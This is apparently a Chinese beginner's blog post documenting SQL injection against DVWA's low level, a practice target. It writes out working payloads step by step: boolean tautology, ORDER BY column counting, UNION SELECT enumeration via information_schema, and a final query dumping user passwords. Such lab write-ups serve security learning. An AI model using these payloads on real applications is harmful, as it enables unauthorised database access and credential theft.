DVWA渗透笔记 SQL注入-LOW级

Posted 菜鸡GGBond

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了DVWA渗透笔记 SQL注入-LOW级相关的知识,希望对你有一定的参考价值。

简介:

  1. DVWA的LOW漏洞大概是,没有对用户,输入的数据进行过滤。
  2. DVWA靶场链接:https://bachang.ikillyou.top/DVWA/login.php
  3. 今天刚开始学DVWA,感觉有很多要记,放在自己的电脑上又怕不去看,放在这里看的时候,还可以给自己增加浏览量。
  4. 文章中使用 // 作为注释。

1.登录DVWA 账号:admin 密码:password

2.登录完以后把DVWA设置成low级 点击Submit提交 。

3.点击SQL lnjection 然后拉到最下面 点击View Source查看源码。

4.按照所传递数据的类型,分类数字型和字符串型,我们可以看到 '$id'变量,是字符串说明,这个可能是一个字符型注入 字符型注入我们需要注意闭合 

5.开始测试 点击SQL lnjection 输入1 //返回一个参数

6.输入3在进行测试 //还是返回一个参数

7.在重新判断,是否真的是字符型的,输入1+2 //它没有进行运算。我们现在可以确定,是字符型。

8.我们开始SQL测试,输入 'or 1 = 1 or' //假or真or假 可以看到用户都爆出来了。

9.再来判断字段的长度 1' order by 1# //显示正常 我们在测试1' order by 2# //也显示正常

我们在测试一下 1' order by 3#  //3报错了,说明只有两个字段!

10.只有两个字段,我们可以来构造联合查询了,目的是为了查看回显的字段 。

输:1' union select 1,2#  //我们看到了结果显示都可以回显。

11.查看到都可以回显,我们就开始找当前,用户数据库的名字,

输:1' union select user(),database()# 

结果已经显示出来了 可以看到,用户:root@localhost 数据库:dvwa

12.我们现在就可以,从dvwa看看他都有哪些表。

1' union select 1,table_name from information_schema.tables where table_schema='dvwa' #

看到dvwa这个数据库里有guestbook和users两个表,存放账号和密码的放在users表。

13.查看user表里的列里面的数据。

输:1' union select 1,column_name from information_schema.columns wheretable_name='user'#

users的列已经爆出来了,接下来我们就是开始看password列里面的数据了。

14.输:1' union select user,password from users#

可以看到密码已经爆出来了。

完:刚刚开始老是把 from 写成 form 然后一直报错。。。 需要注意语法格式!

以上是关于DVWA渗透笔记 SQL注入-LOW级的主要内容,如果未能解决你的问题,请参考以下文章

MSF——一次完整的渗透流程

安全渗透学习-dvwa(命令注入)

DVWA学习笔记--06--SQL Injection

渗透测试学习笔记

渗透测试学习笔记

iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入(宽字节注入)